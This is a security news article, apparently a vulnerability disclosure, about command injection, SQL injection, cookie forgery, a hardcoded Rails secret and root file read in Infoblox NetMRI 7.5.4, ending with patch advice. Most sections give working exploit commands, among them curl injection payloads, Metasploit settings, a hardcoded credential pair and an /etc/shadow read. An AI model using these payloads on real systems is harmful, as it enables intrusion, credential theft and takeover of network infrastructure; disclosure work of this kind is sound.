Researchers Discover Critical NetMRI Bugs Enabling Full Administrative Access

Security researchers have disclosed a series of critical vulnerabilities in Infoblox’s NetMRI network automation and configuration management virtual appliance (version 7.5.4.104695).

These flaws allow unauthenticated attackers to achieve full administrative control over affected devices, highlighting the importance of timely security updates in network management systems.

The research, which resulted in multiple CVE assignments, details exploits ranging from unauthenticated command injection to privilege escalation via hardcoded credentials and cookie forgery.

This article provides an in-depth technical walkthrough of these vulnerabilities, the exploitation techniques, and mitigations.

Technical Breakdown of the Vulnerabilities

1. Unauthenticated Command Injection (CVE-2025-32813)

A major flaw exists in the /webui/application/get_saml_request endpoint. The endpoint retrieves SAML requests and processes a user-controlled parameter (saml_id) directly in a shell command via Ruby’s IO.popen, leading to command injection:

Vulnerable code excerpt:

rubyIO.popen("python3 /skipjack/app/scripts/saml_helper/get_saml_request.py #{saml_id}")

By crafting a saml_id that includes shell metacharacters, an attacker can execute arbitrary OS commands:

Exploit Example:

shellcurl -k "https://<NETMRI_HOST>/webui/application/get_saml_request?saml_id=1%26http://$(whoami)"

Appending shell commands after an ampersand (&) allows execution, with output delivered in the HTTP response.

2. Remote Code Execution via Hardcoded Rails Cookie Secret

NetMRI contains a Ruby on Rails component with a hardcoded session secret found at /skipjack/app/rails/config/session_secret.txt. This facilitates deserialization attacks: anyone with the key can forge session cookies, leading to remote code execution (RCE).

Metasploit module usage:

shelluse exploit/multi/http/rails_secret_deserialization
set COOKIE_NAME _netmri
set SECRET <hardcoded_secret>
set RHOST <NETMRI_HOST>
run

A forged cookie can grant shell access as the NetMRI user, which can be escalated to root using sudo (due to an insecure sudoers configuration):

shellsudo /bin/sh

3. SQL Injection (CVE-2025-32814, CVE-2024-52874)

Unauthenticated SQL Injection

The skipjackUsername parameter on the login page is vulnerable, allowing attackers to extract database contents, including encrypted admin passwords.

Proof of Concept:

shellcurl -k "https://<NETMRI_HOST>/netmri/config/userAdmin/login.tdf?skipjackUsername=admin\"+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=\"admin\"),\"password\",1),CHAR(126)),null)--&skipjackPassword=anything"

Authenticated SQL Injection

Admin users can trigger SQL injection via the Scripts parameter:

shellcurl -k "https://<NETMRI_HOST>/netmri/ccs/tx/run/Run.tdf?Scripts=1+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=\"admin\"),\"password\",1),CHAR(126)),null)--"

4. Privilege Escalation and Cookie Forgery (CVE-2025-32815)

Hardcoded credentials in configuration files (syslog.cfg) can be used with internal APIs (SetRawCookie.tdf, SetCookie.tdf). These endpoints are vulnerable to newline injection, allowing attackers to forge session cookies and impersonate the admin:

Cookie Forgery Example:

shellcurl -u '_pm:pm19726' -k "https://<NETMRI_HOST>/netmri/common/SetRawCookie.tdf?name=letmein&value=%78%79%7a%0d%0a%55%73%65%72%4e%61%6d%65%3d%61%64%6d%69%6e"

Decoded, the value injects a new line, creating a cookie file as:

textletmein
UserName=admin

This session now grants administrative access in the application.

5. Arbitrary File Read as Root (CVE-2024-54188)

A Java servlet (ViewerFileServlet) exposes a file read vulnerability:

Exploit Example:

shellcurl -b <admin_cookie> "https://<NETMRI_HOST>/visual/ViewerFileServlet?fileName=/etc/shadow"

Authenticated attackers can read any file as root, exposing sensitive operating system and application data.

Mitigation and Recommendations

These vulnerabilities especially unauthenticated command and SQL injection, RCE through cookie forging, and admin escalation represent immediate risk for networks running affected NetMRI versions.

Remediation Steps:

• Upgrade NetMRI to version 7.6.1 or later, which patches all reported vulnerabilities.
• Remove and rotate any hardcoded or leaked credentials.
• Audit custom scripts and integrations for persistent backdoors.
• Monitor server logs for suspicious access to vulnerable endpoints.

The discovery of these flaws in Infoblox NetMRI highlights the far-reaching impact of web application vulnerabilities in network management products. Organizations are strongly advised to patch urgently, as exploitation can lead to total compromise of network infrastructure.